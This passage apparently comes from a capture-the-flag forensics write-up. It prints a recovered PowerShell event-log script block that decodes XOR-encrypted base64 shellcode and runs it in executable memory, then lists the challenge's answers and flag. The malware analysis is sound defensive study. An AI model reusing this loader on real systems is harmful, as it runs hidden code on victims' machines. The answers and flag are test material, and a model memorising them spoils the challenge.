<Data Name="ScriptBlockText">function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL7yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCEsplEjIyOoo6sjIyNrpuNXRGsi86hrO3NnqGMDaiLzwHVuEupr3OpiqBerayL1axLjYuLqLo9iIuIbw1bSbyBvBytmGvJW+3tnqGMHaiLzRWKoL2tnqGM/aiLzYqgnq2si82J7Ynt9enlie2J6YnlroM8DYnHcw3tienlrqDHKaNzc3H5qnVRQEXwQESMjYnVqqsVros+DIiMjaqrGap8hIzenbmnlF2J3aqrHb6rSYplvVAUk3PZvqslLIiIjI3pimQqjSCPc9kkpYn1zc24S6m4S42vc42uq4Wvc42uq4mKZySz8w9z2a6rkSTNie2+qwWuq2mKZuoZXQtz2puNXKWrc7VbGy7AjIyNroM8za6rBbhLqSSdie2uq2mKZIfrrfNz2oNsjXXZroOcDfarVSWNieksjMyMjYntrqtFrEupimXuHcMbc9muq4Gqq5G4S6mqq02uq+Wuq2mKZIfrrfNz2oNsjXgt7YnR6SyNjIyNie0kjeWKZKAwsE9z2dHpimVZNbkLc9mrc7cof3NzcayLgawrla6bVVpdi3MR7SSN6auTh05aBddz2')
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
</Data>
<Data Name="ScriptBlockId">a161d800-a564-40a3-aad8-4f9e02e966f7</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
The -bxor 35 operation confirms the XOR key used to decrypt the shellcode is 35.
Answering the Questions and Capturing the Flag
With the full chain reconstructed, we connect to the challenge service and answer each forensic question.
nc 83.136.251.168 35441
The service walks through each finding. The program copied and renamed is cscript.exe to calc.exe; the VBS deobfuscation function is LLdunAaXwVgKfowf; the next-stage executor is powershell.exe; the spreadsheet ID is 1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ; the payload lives in Sheet1:O37; the relevant PowerShell event ID is 4104; and the shellcode XOR key is 35.
What program is being copied, renamed, and what is the final name? (Eg: notepad.exe:picture.jpeg)
> cscript.exe:calc.exe
[+] Correct!
What is the name of the function that is used for deobfuscating the strings, in the VBS script? (Eg: funcName)
> LLdunAaXwVgKfowf
[+] Correct!
What program is used for executing the next stage? (Eg: notepad.exe)
> powershell.exe
[+] Correct!
What is the Spreadsheet ID the malicious actor downloads the next stage from? (Eg: U3ByZWFkU2hlZXQgSUQK)
> 1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ
[+] Correct!
What is the Sheet Name and Cell Number that houses the payload? (Eg: Sheet1:A1)
> Sheet1:O37
[+] Correct!
What is the Event ID that relates to Powershell execution? (Eg: 5991)
> 4104
[+] Correct!
In the final payload, what is the XOR Key used to decrypt the shellcode? (Eg: 1337)
> 35
[+] Correct!
[+] Here is the flag: HTB{GSH33ts_4nd_str4ng3_f0rmula3_byp4ss1ng_f1r3w4lls!!}
The flag is HTB{GSH33ts_4nd_str4ng3_f0rmula3_byp4ss1ng_f1r3w4lls!!}.